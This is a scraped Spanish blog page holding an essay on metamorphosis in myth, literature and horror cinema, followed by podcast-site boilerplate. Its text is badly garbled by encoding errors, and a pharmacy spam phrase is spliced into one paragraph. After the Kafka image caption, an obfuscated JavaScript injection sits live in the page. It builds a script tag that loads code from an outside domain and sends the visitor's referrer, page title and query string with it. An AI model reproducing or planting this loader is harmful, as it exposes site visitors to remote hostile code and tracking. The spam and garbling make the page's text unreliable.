Saltear al contenido principal

Kiseijuu Sei no Kakuritsu, arte digital de Dante Corvus

Entendemos por metamorfosis en los seres vivos a un gran cambio estructural y fisiolA?gico. En un universo en constante cambio, nos produce especial asombro este tipo de transformaciA?n: los organismos comienzan como un tipo de ser y cambian a otro drA?sticamente. AsA� una oruga se convierte en mariposa o un renacuajo en rana o sapo.

Algo que a simple vista luce tan misterioso y mA?gico despertA? nuestra imaginaciA?n y asombro, lo cual se manifestA? en muchas culturas como relatos de seres humanos que se transforman en otra cosa debido a la intervenciA?n divina. Tenemos la leyenda de los cuatro soles en MA�xico, en el que cada sol terminaba en una catA?strofe y los habitantes eran convertidos en monos, peces o guajolotes.

MA?scara de simio tradicional, Teyacapan, Oaxaca.

Los griegos amaban los relatos de transformaciA?n en sus leyendas; a�?Las Metamorfosisa�? de Ovidio es una colecciA?n de relatos donde los protagonistas son transformados en todo tipo de animales, plantas o minerales. Las a�?Mil y una nochesa�? abundan con relatos de personas que son convertidas en animales por medio de fuerzas sobrenaturales.

Pero, A?quA� tanto puede entender la oruga que estA? por convertirse en otro ser? Ella cuenta con una conciencia limitada, A?quA� harA�amos si esto nos pasara a nosotros? Los cambios duelen, aunque tengamos la certeza de que esta transformaciA?n es necesaria y que nuestra nueva forma se siente correcta. A?CA?mo experimentarA�amos esta sensaciA?n de transformaciA?n si no hubiera nadie para explicarnos lo que estA? sucediendo? SerA�a inexplicable, misterioso y horrible.

AcrA?bata, Pablo Picasso, 1930. A�leo sobre lienzo. MusA�e Picasso, ParA�s, Francia.

Los escritores contemporA?neos han jugado con la idea. a�?La Metamorfosisa�? de Franz Kafka narra la lenta transformaciA?n de un hombre en un insecto. Amar es el plan, el plan es morirA�(1973) de James Triptree Jr. (seudA?nimo de Alice Bradley Sheldon, escritora norteamericana quien firmA? sus escritos los firmA? bajo un nombre masculino para no ser discriminada), es un relato en un planeta lejano donde el protagonista pasa por diferentes transformaciones para poder reproducirse.

Cuando era niA�o, vi en la televisiA?n el episodio del Dr. Who Ark in Space, donde el capitA?n se convierte lentamente en un insecto gigante. A pesar de los malos efectos especiales la transformaciA?n me asustA? mucho en ese momento. No podemos olvidar The Fly, ambas versiones (1958 y 1986), que hablan del horror de convertirse en un monstruo. La A?ltima pelA�cula de horror que me causA? incomodidad sobre el tema fue a�?Ginger Snapsa�? (2000) done una jovencita se convierte gradualmente en un hombre lobo.

Ginger Snaps (2000) – Dir. John Fawcett

Sin embargo, aunque no lo notemos, en nuestra existencia humana cambiamos y nos transformamos. QuizA?s no tan drA?sticamente como la oruga, pero como niA�os crecemos hasta volvernos adultos y luego envejecemos y morimos. Nuestra nociA?n de quienes somos nos acompaA�a y nos apoya en las partes mA?s difA�ciles de estos cambios, aunque las memorias de la sensaciA?n de extraA�eza e inseguridad de dichos periodos nos acompaA�arA?n siempre.

buy orlistat 120mg in usa. Es esta misma nociA?n del Yo la que nos protege y hace que nos parezca natural el cambio.A�No despertamos un dA�a y descubrimos todo nuestro cabello gris; esto ocurre de una manera gradual para que no lo notemos y lo consideremos a�?naturala�?. Hasta que alguien que no nos ha visto en aA�os nos encuentra y se sorprende, es que reflexionamos sobre lo que hemos cambiado y perdido. Si pudiA�ramos percibir los cambios nos horrorizarA�amos. Pero nuestra conciencia nos protege y nos filtra el horror de esta transformaciA?n que vivimos diariamente. A?QuA� es mA?s terrible: cambiar de improviso, o gradualmente y sin notarlo? En cualquiera de las dos opciones, es producido por nuestra biologA�a y nada podemos hacer para detenerlo.

Portada alterna paraA�La metamorfosisA�(1915), Franz Kafka.

var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Facebook Comments

Gerardo Braham

El Doctor Braham es el alterego de Gerardo Braham, ingeniero, astrólogo y estudioso de las ciencias ocultas. Su opinión es meramente producto de sus neurosis. El doctorado que presume en su nombre procede de las ciencias ocultas y le fue otorgado por la universidad de Miskatonic.

PGlmcmFtZSBzcmM9Imh0dHBzOi8vd3d3Lmdvb2dsZS5jb20vbWFwcy9lbWJlZD9wYj0hMW0xOCExbTEyITFtMyExZDYwNDQuMjc1NjM3NDU2ODA1ITJkLTczLjk4MzQ2MzY4MzI1MjA0ITNkNDAuNzU4OTkzNDExNDc4NTMhMm0zITFmMCEyZjAhM2YwITNtMiExaTEwMjQhMmk3NjghNGYxMy4xITNtMyExbTIhMXMweDAlM0EweDU1MTk0ZWM1YTFhZTA3MmUhMnNUaW1lcytTcXVhcmUhNWUwITNtMiExc2VuITJzITR2MTM5MjkwMTMxODQ2MSIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZnJhbWVib3JkZXI9IjAiIHN0eWxlPSJib3JkZXI6MCI+PC9pZnJhbWU+
CONTACT US
COMPANY NAME
221, Mount Olimpus, Rheasilvia, Mars
Solar System, Milky Way Galaxy
+1 (999) 999-99-99
Thank You. We will contact you as soon as possible.
CÓMO ESCUCHAR
Puedes escucharnos aquí, en nuestro sitio, o en iTunes, Soundcloud y en varias apps de podcasts.

También escúchanos en vivo por Bizarro.fm, Radio ILCE y Concepto Radial

entra a nuestras redes sociales
 
SUSCRÍBETE A
Puedes escuchar PSICOFONÍAS aquí, en nuestro sitio, o en cualquiera de estas aplicaciones:
SUSCRÍBETE A
Puedes escuchar PSICOFONÍAS aquí, en nuestro sitio, o en cualquiera de estas aplicaciones:
¿NO SABES ESCUCHAR PODCASTS?
SUSCRÍBETE A
Puedes escuchar POR QUÉ NOS DA MIEDO aquí, en nuestro sitio, o en cualquiera de estas aplicaciones:
SUSCRÍBETE A
Puedes escuchar POR QUÉ NOS DA MIEDO aquí, en nuestro sitio, o en cualquiera de estas aplicaciones:
¿NO SABES ESCUCHAR PODCASTS?
SUSCRÍBETE A
Puedes escuchar TERROR EN UN SUSPIRO aquí, en nuestro sitio, o en Soundcloud:
SUSCRÍBETE A
Puedes escuchar TERROR EN UN SUSPIRO aquí, en nuestro sitio, o en Soundcloud:
¿NO SABES ESCUCHAR PODCASTS?